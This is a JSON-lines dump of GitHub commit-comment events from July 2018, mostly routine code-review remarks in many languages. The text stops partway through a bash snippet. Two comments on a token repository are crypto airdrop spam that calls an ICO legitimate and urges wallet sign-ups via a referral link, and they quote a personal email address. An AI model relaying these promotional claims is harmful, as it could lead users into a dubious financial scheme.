{"id":"8016084647","type":"CommitCommentEvent","actor":{"login":"sirathashimi"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29828087,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-25T12:16:47Z","updated_at":"2018-07-25T12:16:47Z","author_association":"NONE","body":"Avinoc Network Operation Chain. A legitimate, transparent project with a\nworking use case, road map, and whitepaper. ICO Rating: 4.1/5. Click the\nlink, sign up, submit your ERC-20 wallet address and start receiving Avinoc\nworth $300+. Airdrop ends in 7 days! 🔥\nhttps://www.avinoc.com/r/Xa4hvUactw9o💰\n\nOn Wednesday, July 25, 2018, Duke7467 <notifications@github.com> wrote:\n\n> it is good proj.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29828033>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Am4jXYjZKhssGHWe7g3EUNSmq4xKv7NIks5uKGAygaJpZM4VaEAl>\n> .\n>\n"}},"created_at":"2018-07-25T12:16:47Z"}
{"id":"8016084904","type":"CommitCommentEvent","actor":{"login":"oliv3r"},"repo":{"name":"Ultimaker/um-rootfs_debian_armhf"},"payload":{"comment":{"id":29828088,"position":3,"line":3,"path":"tests/buildenv.sh","commit_id":"60dc9b86685fc1497ecaf83154933cb0125d70ae","created_at":"2018-07-25T12:16:51Z","updated_at":"2018-07-25T12:16:51Z","author_association":"CONTRIBUTOR","body":"I like your approach of running this test script from the build_for_ultimaker.sh so much, that i think we should do that as a standard.\r\nAs a consequence, the set -eux becomes VERY noisy for a normal user. As such, we should remove the -x here, and have the CI call the script as sh -x tests/buildenv.sh instead. This will then add the -x which we want in our automated environment."}},"created_at":"2018-07-25T12:16:51Z"}
{"id":"8016087210","type":"CommitCommentEvent","actor":{"login":"grillazz"},"repo":{"name":"encode/django-rest-framework"},"payload":{"comment":{"id":29828093,"position":null,"line":null,"path":null,"commit_id":"e5781440fa6ccff09abc6e0566bdfdd9b84a80a1","created_at":"2018-07-25T12:17:17Z","updated_at":"2018-07-25T12:17:17Z","author_association":"NONE","body":"Understood. I did lot of project with DRF in past and current projects. Let me know if I will be able help."}},"created_at":"2018-07-25T12:17:17Z"}
{"id":"8016087302","type":"CommitCommentEvent","actor":{"login":"jeancarpc"},"repo":{"name":"jeancarpc/AprendendoGit"},"payload":{"comment":{"id":29828094,"position":1,"line":1,"path":"README.md","commit_id":"2919fb6af8669c9afbbeeeb69f6225ac262d7296","created_at":"2018-07-25T12:17:18Z","updated_at":"2018-07-25T12:17:18Z","author_association":"OWNER","body":"sadfsadfsadf"}},"created_at":"2018-07-25T12:17:18Z"}
{"id":"8016088965","type":"CommitCommentEvent","actor":{"login":"sirathashimi"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29828100,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-25T12:17:39Z","updated_at":"2018-07-25T12:17:39Z","author_association":"NONE","body":"Join my telegram https://t.me/highpayoutairdrops for more high payout\nairdrop alerts!!\n\nOn Wednesday, July 25, 2018, Sirat Hashimi <siraty69@gmail.com> wrote:\n\n> Avinoc Network Operation Chain. A legitimate, transparent project with a\n> working use case, road map, and whitepaper. ICO Rating: 4.1/5. Click the\n> link, sign up, submit your ERC-20 wallet address and start receiving Avinoc\n> worth $300+. Airdrop ends in 7 days! 🔥 https://www.avinoc.com/r/\n> Xa4hvUactw9o💰\n>\n> On Wednesday, July 25, 2018, Duke7467 <notifications@github.com> wrote:\n>\n>> it is good proj.\n>>\n>> —\n>> You are receiving this because you commented.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29828033>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/Am4jXYjZKhssGHWe7g3EUNSmq4xKv7NIks5uKGAygaJpZM4VaEAl>\n>> .\n>>\n>\n"}},"created_at":"2018-07-25T12:17:39Z"}
{"id":"8016090560","type":"CommitCommentEvent","actor":{"login":"tlil"},"repo":{"name":"corda/corda"},"payload":{"comment":{"id":29828103,"position":10,"line":16,"path":"docs/source/cli-ux-guidelines.rst","commit_id":"c2c5858dd9bd45dd7f79311221c6bdf723bde096","created_at":"2018-07-25T12:18:00Z","updated_at":"2018-07-25T12:18:00Z","author_association":"CONTRIBUTOR","body":"Will this be equivalent to ``--log-to-console`` then?"}},"created_at":"2018-07-25T12:18:00Z"}
{"id":"8016091515","type":"CommitCommentEvent","actor":{"login":"chawitzoon"},"repo":{"name":"chawitzoon/lecture0"},"payload":{"comment":{"id":29828106,"position":null,"line":null,"path":null,"commit_id":"42b99e30d0649ab06759138f8e5c3c5f3f8db19e","created_at":"2018-07-25T12:18:12Z","updated_at":"2018-07-25T12:18:12Z","author_association":"OWNER","body":"yes"}},"created_at":"2018-07-25T12:18:12Z"}
{"id":"8016095418","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"hocus2pocus/study_projects"},"payload":{"comment":{"id":29828110,"position":8,"line":7,"path":"ruby_module_10/acсessors.rb","commit_id":"dadaad000d96d28c9f6711a41aa197a77f8939a8","created_at":"2018-07-25T12:18:58Z","updated_at":"2018-07-25T12:18:58Z","author_association":"NONE","body":"в `attr_accessor_with_history` все работает верно!\r\n\r\nно логику нужно немного поправить:\r\nв этой реализации ты помещаешь текущее значение в историю, а нужно - предыдущее\r\n\r\nнапример:\r\n1. присваиваем значение переменной в первый раз, в истории пока пустой массив\r\n2. присваиваем новое значение - в переменной новое значение, а в истории - старое и т.п.\r\n\r\nдругими словами: текущее значение переменной в историю не попадает"}},"created_at":"2018-07-25T12:18:58Z"}
{"id":"8016096444","type":"CommitCommentEvent","actor":{"login":"vladsoroka"},"repo":{"name":"JetBrains/android"},"payload":{"comment":{"id":29828113,"position":null,"line":null,"path":null,"commit_id":"d13332c17c124a731b41e57783c146b36eac15da","created_at":"2018-07-25T12:19:10Z","updated_at":"2018-07-25T12:19:10Z","author_association":"CONTRIBUTOR","body":"The default behavior of the platform util `formatDuration` method was changed. My intention was to retain existing duration format of the android sync state which looked more suitable to me. Feel free to change it."}},"created_at":"2018-07-25T12:19:10Z"}
{"id":"8016101748","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"DDT-Kibe/meikai_java2018_04"},"payload":{"comment":{"id":29828126,"position":29,"line":29,"path":"meikai_java2018_05/src/e_03/e_03_05.java","commit_id":"180367ca21214cff9cb5b6930c3f6782a0ccfe36","created_at":"2018-07-25T12:20:15Z","updated_at":"2018-07-25T12:20:15Z","author_association":"COLLABORATOR","body":"柴田\r\nマジックナンバーは排除してください。"}},"created_at":"2018-07-25T12:20:15Z"}
{"id":"8016109189","type":"CommitCommentEvent","actor":{"login":"DovMiller"},"repo":{"name":"DevExpress-Examples/aspxdocumentviewer-how-to-dynamically-preview-a-report-in-document-viewer-after-a-button-w-t132094"},"payload":{"comment":{"id":29828141,"position":null,"line":null,"path":null,"commit_id":"5f4e4dacd19e5c5734754284bed1f3047074633e","created_at":"2018-07-25T12:21:44Z","updated_at":"2018-07-25T12:21:44Z","author_association":"NONE","body":"Hello DevExpress\r\nThe full code is not displayed. There's a problem with your links. This has happened to me a number of times and it's very annoying!"}},"created_at":"2018-07-25T12:21:44Z"}
{"id":"8016112176","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"hocus2pocus/study_projects"},"payload":{"comment":{"id":29828145,"position":4,"line":4,"path":"ruby_module_10/cargo_train.rb","commit_id":"dadaad000d96d28c9f6711a41aa197a77f8939a8","created_at":"2018-07-25T12:22:18Z","updated_at":"2018-07-25T12:22:18Z","author_association":"NONE","body":"смотри:\r\n```\r\n$ irb\r\n2.5.1 :001 > class A; AA = 2; end;\r\n => 2 \r\n2.5.1 :002 > A::AA\r\n => 2 \r\n2.5.1 :003 > class B < A; end;\r\n => nil \r\n2.5.1 :004 > B::AA\r\n => 2 \r\n2.5.1 :005 >\r\n```\r\nэто я на что намекаю? что как раз константы то достаточно одной - в родителе"}},"created_at":"2018-07-25T12:22:18Z"}
{"id":"8016112435","type":"CommitCommentEvent","actor":{"login":"BrandonCookeDev"},"repo":{"name":"BrandonCookeDev/smashgg.js"},"payload":{"comment":{"id":29828147,"position":null,"line":null,"path":null,"commit_id":"46e96da55bffd907293cc701bc5c8772dc6adb9b","created_at":"2018-07-25T12:22:22Z","updated_at":"2018-07-25T12:22:22Z","author_association":"OWNER","body":"Adjusted test criteria for sets that are in progress or incomplete (which new code is allowable)"}},"created_at":"2018-07-25T12:22:22Z"}
{"id":"8016150528","type":"CommitCommentEvent","actor":{"login":"ehrenfeu"},"repo":{"name":"imcf/auto-tx"},"payload":{"comment":{"id":29828232,"position":null,"line":null,"path":null,"commit_id":"3752c5e40a15a1ee83565c797f8807f9dcffb9ad","created_at":"2018-07-25T12:29:50Z","updated_at":"2018-07-25T12:29:50Z","author_association":"MEMBER","body":"#1 "}},"created_at":"2018-07-25T12:29:50Z"}
{"id":"8016160980","type":"CommitCommentEvent","actor":{"login":"homer8173"},"repo":{"name":"CleverIT/UBL_invoice"},"payload":{"comment":{"id":29828249,"position":null,"line":null,"path":null,"commit_id":"d219ac5889a681f96902b8db03748377de5769d2","created_at":"2018-07-25T12:31:53Z","updated_at":"2018-07-25T12:31:53Z","author_association":"NONE","body":"isn't it required ?\r\nhttp://www.datypic.com/sc/ubl21/e-cac_TaxTotal.html\r\n\r\ni have trouble with it too"}},"created_at":"2018-07-25T12:31:53Z"}
{"id":"8016163645","type":"CommitCommentEvent","actor":{"login":"rwb27"},"repo":{"name":"boykovdn/picamera"},"payload":{"comment":{"id":29828252,"position":null,"line":null,"path":null,"commit_id":"e5f5270f82d158f17a6c392c4f5a1d3fe976a6a2","created_at":"2018-07-25T12:32:24Z","updated_at":"2018-07-25T12:32:24Z","author_association":"NONE","body":"cool - though unless I've missed something, can't you just set ``camera._exif_tags`` without modifying the module at all?  I'm not sure we gain much by wrapping it in a method, other than adding a docstring.  Perhaps you could add a docstring to the _exif_tags property/attribute instead?"}},"created_at":"2018-07-25T12:32:24Z"}
{"id":"8016171115","type":"CommitCommentEvent","actor":{"login":"Polfo"},"repo":{"name":"symfony/console"},"payload":{"comment":{"id":29828268,"position":5,"line":40,"path":"Output/Output.php","commit_id":"ff2b2c5f4dedbf573d179d9e9e6254f3b3987026","created_at":"2018-07-25T12:33:54Z","updated_at":"2018-07-25T12:33:54Z","author_association":"NONE","body":"the `(?int` syntax causes a `PHP Parse error:  syntax error, unexpected '?', expecting variable (T_VARIABLE)`"}},"created_at":"2018-07-25T12:33:54Z"}
{"id":"8016171535","type":"CommitCommentEvent","actor":{"login":"wangshuai0"},"repo":{"name":"kl2426/vue-element-bigdata-table"},"payload":{"comment":{"id":29828271,"position":null,"line":null,"path":null,"commit_id":"d98ffab4903eba501bf1d229b006946358c59c0f","created_at":"2018-07-25T12:33:59Z","updated_at":"2018-07-25T12:33:59Z","author_association":"NONE","body":"好厉害，解决了我项目中一大问题。非常感谢，我也研究看了这个 https://github.com/Akryum/vue-virtual-scroller。 我已经在项目中用了你这个了，有一个小问题，就是滚动过快出现白色闪动。"}},"created_at":"2018-07-25T12:33:59Z"}
{"id":"8016172310","type":"CommitCommentEvent","actor":{"login":"stewstar"},"repo":{"name":"Songbz1999/pythonForFinance"},"payload":{"comment":{"id":29828273,"position":12,"line":12,"path":"lesson3/bz-pgsql-1.0.0.py","commit_id":"9088ecca3ede39068cc85275fe7533a69725624b","created_at":"2018-07-25T12:34:09Z","updated_at":"2018-07-25T12:34:09Z","author_association":"NONE","body":"方法重载"}},"created_at":"2018-07-25T12:34:09Z"}
{"id":"8016174223","type":"CommitCommentEvent","actor":{"login":"jccriado"},"repo":{"name":"jccriado/matchingtools"},"payload":{"comment":{"id":29828281,"position":18,"line":37,"path":"matchingtools/core.py","commit_id":"beb61694a3fbd6cde3852b58b4ea6e14a212e095","created_at":"2018-07-25T12:34:30Z","updated_at":"2018-07-25T12:34:30Z","author_association":"OWNER","body":"Should be: `differentiated = differentiated.differentiate(index)` "}},"created_at":"2018-07-25T12:34:30Z"}
{"id":"8016178165","type":"CommitCommentEvent","actor":{"login":"jccriado"},"repo":{"name":"jccriado/matchingtools"},"payload":{"comment":{"id":29828290,"position":107,"line":223,"path":"matchingtools/core.py","commit_id":"beb61694a3fbd6cde3852b58b4ea6e14a212e095","created_at":"2018-07-25T12:35:18Z","updated_at":"2018-07-25T12:35:18Z","author_association":"OWNER","body":"Right"}},"created_at":"2018-07-25T12:35:18Z"}
{"id":"8016185953","type":"CommitCommentEvent","actor":{"login":"noobpwnftw"},"repo":{"name":"noobpwnftw/Stockfish"},"payload":{"comment":{"id":29828303,"position":null,"line":null,"path":null,"commit_id":"e7069d28b3ccce66e3ad5729920a708f9cade080","created_at":"2018-07-25T12:36:49Z","updated_at":"2018-07-25T12:36:49Z","author_association":"OWNER","body":"LTC still failed as non-regression, so this bias still have some negative effect.\r\nI'm halving the bias and test again.\r\n"}},"created_at":"2018-07-25T12:36:49Z"}
{"id":"8016189127","type":"CommitCommentEvent","actor":{"login":"herrherrmann"},"repo":{"name":"doug2k1/react-on-screen"},"payload":{"comment":{"id":29828314,"position":null,"line":null,"path":null,"commit_id":"f0a23cf5e39f6d592ff646294cc433fc75812464","created_at":"2018-07-25T12:37:26Z","updated_at":"2018-07-25T12:37:26Z","author_association":"NONE","body":"A little problem that I encountered with this is that you'd still need to make sure that `this.setState` isn't being called for an unmounted component.\r\n\r\nWe usually use something like a `safeSetState` function for this purpose:\r\n```js\r\nconstructor(props) {\r\n    // ...\r\n    this.unmounted = false;\r\n}\r\n\r\ncomponentWillUnmount() {\r\n    this.unmounted = true;\r\n    this.removeListener();\r\n}\r\n\r\nsafeSetState = (...args) => {\r\n    if (this.unmounted) {\r\n        return;\r\n    }\r\n    this.setState(...args);\r\n};\r\n\r\nisComponentVisible = () => {\r\n    // ...\r\n    this.safeSetState({ isVisible });\r\n};\r\n```"}},"created_at":"2018-07-25T12:37:26Z"}
{"id":"8016190597","type":"CommitCommentEvent","actor":{"login":"Polfo"},"repo":{"name":"symfony/console"},"payload":{"comment":{"id":29828316,"position":5,"line":40,"path":"Output/Output.php","commit_id":"ff2b2c5f4dedbf573d179d9e9e6254f3b3987026","created_at":"2018-07-25T12:37:43Z","updated_at":"2018-07-25T12:37:43Z","author_association":"NONE","body":"the `(?int`  causes a `PHP Parse error:  syntax error, unexpected '?', expecting variable (T_VARIABLE)`"}},"created_at":"2018-07-25T12:37:43Z"}
{"id":"8016193661","type":"CommitCommentEvent","actor":{"login":"olstenlarck"},"repo":{"name":"WebReflection/ascjs"},"payload":{"comment":{"id":29828318,"position":11,"line":183,"path":"index.js","commit_id":"3240ef9a171b114e39b747adbd30642f7a5f725b","created_at":"2018-07-25T12:38:21Z","updated_at":"2018-07-25T12:38:21Z","author_association":"NONE","body":"oh yea.. didnt thought about require in esm, that it can be anything. hm, good point.\r\n\r\nso yea, will use the ignore when needed."}},"created_at":"2018-07-25T12:38:21Z"}
{"id":"8016193736","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29828319,"position":18,"line":24,"path":"Nianyi.js","commit_id":"10eeab2d64f43cd1b311d0ae382cb4e9fd81abb9","created_at":"2018-07-25T12:38:22Z","updated_at":"2018-07-25T12:38:22Z","author_association":"OWNER","body":"Extract function."}},"created_at":"2018-07-25T12:38:22Z"}
{"id":"8016194814","type":"CommitCommentEvent","actor":{"login":"sumwale"},"repo":{"name":"SnappyDataInc/snappydata"},"payload":{"comment":{"id":29828322,"position":21,"line":82,"path":"docs/best_practices/important_settings.md","commit_id":"68f6ffb98bfbb95ce7acb48b67f3bf4d19921b99","created_at":"2018-07-25T12:38:35Z","updated_at":"2018-07-25T12:38:35Z","author_association":"CONTRIBUTOR","body":"@lizygeogy \r\nLooking at it again, can be reworded to be clearer as below:\r\n\r\nThese settings lower the OS cache buffer sizes which reduces long GC pauses during disk flush but can decrease overall disk write throughput. This is especially true for slower magnetic disks where the bulk insert throughput can see a noticeable drop (such as 20%), while the duration of GC pauses should reduce significantly (such as 50% or more). If long GC pauses, for example in the range of 10s of seconds, during bulk inserts, updates or deletes is not a problem then these settings can be skipped.\r\n"}},"created_at":"2018-07-25T12:38:35Z"}
{"id":"8016196228","type":"CommitCommentEvent","actor":{"login":"Histidine91"},"repo":{"name":"ZeroK-RTS/Zero-K"},"payload":{"comment":{"id":29828324,"position":39,"line":39,"path":"LuaUI/Widgets/gui_missile_select.lua","commit_id":"3b160d49220f7ef6d847b2e24989f200b2f3bdbc","created_at":"2018-07-25T12:38:51Z","updated_at":"2018-07-25T12:38:51Z","author_association":"MEMBER","body":"It could select other silos' missiles in principle, yes (although the search range could be reduced enough that this doesn't happen).\r\n\r\nIt uses GetUnitsInRectangle because I couldn't think of a handy way to transmit the unitIDs to widget space; it could set some unitrulesparams values but I expected the code to look ugly. Should I do that anyway, or is there a different method?"}},"created_at":"2018-07-25T12:38:51Z"}
{"id":"8016196440","type":"CommitCommentEvent","actor":{"login":"satishdotpatel"},"repo":{"name":"openstack/nova"},"payload":{"comment":{"id":29828326,"position":null,"line":null,"path":null,"commit_id":"23446a9552b5be3b040278646149a0f481d0a005","created_at":"2018-07-25T12:38:53Z","updated_at":"2018-07-25T12:38:53Z","author_association":"NONE","body":"I have openstack with ceph storage setup and trying to test Live\r\nmigration but somehow it failed and showing following error\r\n\r\nnova.conf (nova version 9.1.2)\r\n\r\n# ceph rbd support\r\nlive_migration_uri = \"qemu+tcp://%s/system\"\r\nlive_migration_tunnelled = True\r\n\r\nlibvirtd.conf\r\n\r\nlisten_tls = 0\r\nlisten_tcp = 1\r\nunix_sock_group = \"libvirt\"\r\nunix_sock_ro_perms = \"0777\"\r\nunix_sock_rw_perms = \"0770\"\r\nauth_unix_ro = \"none\"\r\nauth_unix_rw = \"none\"\r\nauth_tcp = \"none\"\r\n\r\n\r\nThis is the error i am getting, i google it but didn't find any reference\r\n\r\n\r\n\r\n] [instance: 2b92ca5b-e433-4ac7-8dc8-619c9523ba97] Live migration\r\nfailed.: AttributeError: 'Guest' object has no attribute\r\n'migrate_configure_max_speed'"}},"created_at":"2018-07-25T12:38:53Z"}
{"id":"8016196960","type":"CommitCommentEvent","actor":{"login":"amyharmon1"},"repo":{"name":"xojs/xo"},"payload":{"comment":{"id":29828328,"position":7,"line":6,"path":"package.json","commit_id":"309453883c8159855e934f98d0cb2d22eb9aed46","created_at":"2018-07-25T12:39:00Z","updated_at":"2018-07-25T12:39:00Z","author_association":"NONE","body":"nRRmYBYF6fMrNYJrJz3RnmUUJaaUuMjy#1528081305"}},"created_at":"2018-07-25T12:39:00Z"}
{"id":"8016199890","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29828334,"position":61,"line":123,"path":"Nianyi.js","commit_id":"10eeab2d64f43cd1b311d0ae382cb4e9fd81abb9","created_at":"2018-07-25T12:39:33Z","updated_at":"2018-07-25T12:39:33Z","author_association":"OWNER","body":"Some constructors are not allowed to be called directly or indirectly."}},"created_at":"2018-07-25T12:39:33Z"}
{"id":"8016202417","type":"CommitCommentEvent","actor":{"login":"derrickreimer"},"repo":{"name":"levelhq/level"},"payload":{"comment":{"id":29828339,"position":5,"line":38,"path":"script/bootstrap","commit_id":"6a7eff5e199cf78bdfda80bbaef38c09640e598d","created_at":"2018-07-25T12:40:02Z","updated_at":"2018-07-25T12:40:02Z","author_association":"MEMBER","body":"Thanks for the info!"}},"created_at":"2018-07-25T12:40:02Z"}
{"id":"8016210665","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29828352,"position":17,"line":113,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/interface.rb","commit_id":"28abe27ad4f597627f609a821058babe267c5afb","created_at":"2018-07-25T12:41:34Z","updated_at":"2018-07-25T12:41:34Z","author_association":"NONE","body":"`to_s` не нужно, потому что `gets` и так возвращает строку\r\nздесь разве что `chomp` надо добавить, чтобы отсечь символ переноса строки"}},"created_at":"2018-07-25T12:41:34Z"}
{"id":"8016214863","type":"CommitCommentEvent","actor":{"login":"expez"},"repo":{"name":"clojure-emacs/clj-refactor.el"},"payload":{"comment":{"id":29828357,"position":null,"line":null,"path":null,"commit_id":"a0a1e19b442a912d8355c03fa076fdea747513c1","created_at":"2018-07-25T12:42:22Z","updated_at":"2018-07-25T12:42:22Z","author_association":"MEMBER","body":"Thanks @bbatsov! "}},"created_at":"2018-07-25T12:42:22Z"}
{"id":"8016215384","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29828358,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-25T12:42:29Z","updated_at":"2018-07-25T12:42:29Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T12:42:29Z"}
{"id":"8016218051","type":"CommitCommentEvent","actor":{"login":"stewstar"},"repo":{"name":"Songbz1999/pythonForFinance"},"payload":{"comment":{"id":29828363,"position":52,"line":52,"path":"lesson3/bz-pgsql-1.0.0.py","commit_id":"9088ecca3ede39068cc85275fe7533a69725624b","created_at":"2018-07-25T12:43:00Z","updated_at":"2018-07-25T12:43:00Z","author_association":"NONE","body":"http://initd.org/psycopg/articles/2012/10/01/prepared-statements-psycopg/\r\n"}},"created_at":"2018-07-25T12:43:00Z"}
{"id":"8016219062","type":"CommitCommentEvent","actor":{"login":"ramiy"},"repo":{"name":"ramiy/Page-Builder-Server"},"payload":{"comment":{"id":29828367,"position":19,"line":22,"path":"routes/authRoute.js","commit_id":"2e9c6bca55931c39228c3220b81f7e500acda24d","created_at":"2018-07-25T12:43:11Z","updated_at":"2018-07-25T12:43:11Z","author_association":"OWNER","body":"Shuvy said its a duplicate code and asked me to remove this rout."}},"created_at":"2018-07-25T12:43:11Z"}
{"id":"8016221379","type":"CommitCommentEvent","actor":{"login":"stewstar"},"repo":{"name":"Songbz1999/pythonForFinance"},"payload":{"comment":{"id":29828372,"position":52,"line":52,"path":"lesson3/bz-pgsql-1.0.0.py","commit_id":"9088ecca3ede39068cc85275fe7533a69725624b","created_at":"2018-07-25T12:43:40Z","updated_at":"2018-07-25T12:43:40Z","author_association":"NONE","body":"https://stackoverflow.com/questions/19235686/psycopg2-insert-into-table-with-placeholders"}},"created_at":"2018-07-25T12:43:40Z"}
{"id":"8016222816","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29828379,"position":29,"line":125,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/interface.rb","commit_id":"28abe27ad4f597627f609a821058babe267c5afb","created_at":"2018-07-25T12:43:57Z","updated_at":"2018-07-25T12:43:57Z","author_association":"NONE","body":"`rescue` и `retry` нужно выравнять с `def` и `end` метода"}},"created_at":"2018-07-25T12:43:57Z"}
{"id":"8016224140","type":"CommitCommentEvent","actor":{"login":"barrucadu"},"repo":{"name":"alphagov/mapit"},"payload":{"comment":{"id":29828382,"position":19,"line":19,"path":"test-samples.sh","commit_id":"23230ac7bbf7862689eebe653598abcbcd7b0733","created_at":"2018-07-25T12:44:12Z","updated_at":"2018-07-25T12:44:12Z","author_association":"NONE","body":"I'd change this to something like:\r\n\r\n```bash\r\ncheck_postcode(\"local mapit base url\", \"gov.uk mapit base url\", $postcode)\r\n```"}},"created_at":"2018-07-25T12:44:12Z"}
{"id":"8016227124","type":"CommitCommentEvent","actor":{"login":"barrucadu"},"repo":{"name":"alphagov/mapit"},"payload":{"comment":{"id":29828386,"position":42,"line":42,"path":"test-samples.sh","commit_id":"23230ac7bbf7862689eebe653598abcbcd7b0733","created_at":"2018-07-25T12:44:47Z","updated_at":"2018-07-25T12:44:47Z","author_association":"NONE","body":"```bash\r\ncheck_postcode(local_base_url, live_base_url, postcode, output_dir)\r\n```"}},"created_at":"2018-07-25T12:44:47Z"}
{"id":"8016230584","type":"CommitCommentEvent","actor":{"login":"Tyrrrz"},"repo":{"name":"Tyrrrz/YoutubeExplode"},"payload":{"comment":{"id":29828393,"position":null,"line":null,"path":null,"commit_id":"097f527d349f93934c4a12c70b7f5200042fcfa6","created_at":"2018-07-25T12:45:25Z","updated_at":"2018-07-25T12:45:25Z","author_association":"OWNER","body":"@SlowLogicBoy no problem :p"}},"created_at":"2018-07-25T12:45:25Z"}
{"id":"8016238574","type":"CommitCommentEvent","actor":{"login":"losheredos"},"repo":{"name":"tevjef/uct-android"},"payload":{"comment":{"id":29828408,"position":null,"line":null,"path":null,"commit_id":"219b5ee053664b92eae5f71d5f32d45865ec8915","created_at":"2018-07-25T12:46:57Z","updated_at":"2018-07-25T12:46:57Z","author_association":"NONE","body":"I dont have res/drawable-21 and res/drawable/btn_toggle .. What I should do? I get same error it crashes when i press dev setting and its android version 4.4.4. In android 5.0 there is no bug."}},"created_at":"2018-07-25T12:46:57Z"}
{"id":"8016238729","type":"CommitCommentEvent","actor":{"login":"lordofxtreme"},"repo":{"name":"lordofxtreme/solarhome-bd"},"payload":{"comment":{"id":29828409,"position":3,"line":18,"path":"index.php","commit_id":"714f441ae7df85c9677ae65c53de8b961ee04e4b","created_at":"2018-07-25T12:46:58Z","updated_at":"2018-07-25T12:46:58Z","author_association":"OWNER","body":"date time changed here, null value passed "}},"created_at":"2018-07-25T12:46:58Z"}
{"id":"8016239706","type":"CommitCommentEvent","actor":{"login":"suhinini"},"repo":{"name":"pac4j/play-pac4j"},"payload":{"comment":{"id":29828415,"position":68,"line":68,"path":"shared/src/main/java/org/pac4j/play/store/PlayCookieStore.java","commit_id":"05b057e38c6947fd537978e23dd12987ddfdd0a3","created_at":"2018-07-25T12:47:09Z","updated_at":"2018-07-25T12:47:09Z","author_association":"NONE","body":"Crap, undoing this makes cookie size above 10k while only 4k is available. Anyway, default logout scenario does not work with current implementation :\\"}},"created_at":"2018-07-25T12:47:09Z"}
{"id":"8016240558","type":"CommitCommentEvent","actor":{"login":"victorGauchet"},"repo":{"name":"klongou/Test"},"payload":{"comment":{"id":29828416,"position":1,"line":1,"path":"index.html","commit_id":"e7098da4e766768cdea7492ad8cf75e32576b2c2","created_at":"2018-07-25T12:47:17Z","updated_at":"2018-07-25T12:47:17Z","author_association":"COLLABORATOR","body":"sdfsdfsdfsdfsdfsdfsdfsdfsdfsdfsdfsdffsdsdfsdfsdfsdfsdfsdfsdfsdfsdfsdfsdfsdfsdfsdfsdfsdfsdfsdfdsfsdfsdfdsfdsfdsfdsfdsdsfdsfdsfdsfdsfdsfdsfdfdfdsfdsfdsfdsfdsfdsfdsfdsfdsfdsfdsfdsfdsfdfdfdsfdsfdsfsdfdsfdsfsdfsdfdsfdsfdsfdsfdssdfsdfsdfsdfsdfsdfdsfsdfdsfdsfdfdsfsdfdsfsdfdsfsdfsdfdsfdsfsdfsdfsdfsdf"}},"created_at":"2018-07-25T12:47:17Z"}
{"id":"8016242978","type":"CommitCommentEvent","actor":{"login":"sofiane-mokhtari"},"repo":{"name":"Taikos/RT-Team"},"payload":{"comment":{"id":29828426,"position":null,"line":null,"path":null,"commit_id":"72ef161c336bbd9bb6376afa8f0a614d9ea3088d","created_at":"2018-07-25T12:47:45Z","updated_at":"2018-07-25T12:47:45Z","author_association":"COLLABORATOR","body":"c'est beau"}},"created_at":"2018-07-25T12:47:45Z"}
{"id":"8016251179","type":"CommitCommentEvent","actor":{"login":"barrucadu"},"repo":{"name":"alphagov/mapit"},"payload":{"comment":{"id":29828438,"position":53,"line":53,"path":"test-samples.sh","commit_id":"23230ac7bbf7862689eebe653598abcbcd7b0733","created_at":"2018-07-25T12:49:19Z","updated_at":"2018-07-25T12:49:19Z","author_association":"NONE","body":"```bash\r\n  local_url = \"${local_base_url}/${postcode}.json\"\r\n  live_url = \"${live_base_url}/${postcode}.json\"\r\n\r\n  local_response_code = download_url_result($local_url, \"${output_dir}/local.json\")\r\n  live_response_code = download_url_result($live_url, \"${output_dir}/live.json\")\r\n\r\n  if [[ \"$local_response_code\" == \"$live_response_code\" ]]; then\r\n      jsondiff \"${output_dir}/local.json\" \"${output_dir}/live.json\"\r\n  else\r\n      echo \"response code mismatch for ${postcode}: local ${local_response_code} live ${live_response_code}\"\r\n  end\r\n}\r\n\r\ndownload_url_result(url, file) {\r\n  result=$(curl -sw \"%{http_code}\" $url)\r\n  code=\"${result:${#result}-3}\"\r\n\r\n  if [ ${#res} -eq 3 ]; then\r\n    touch $file\r\n  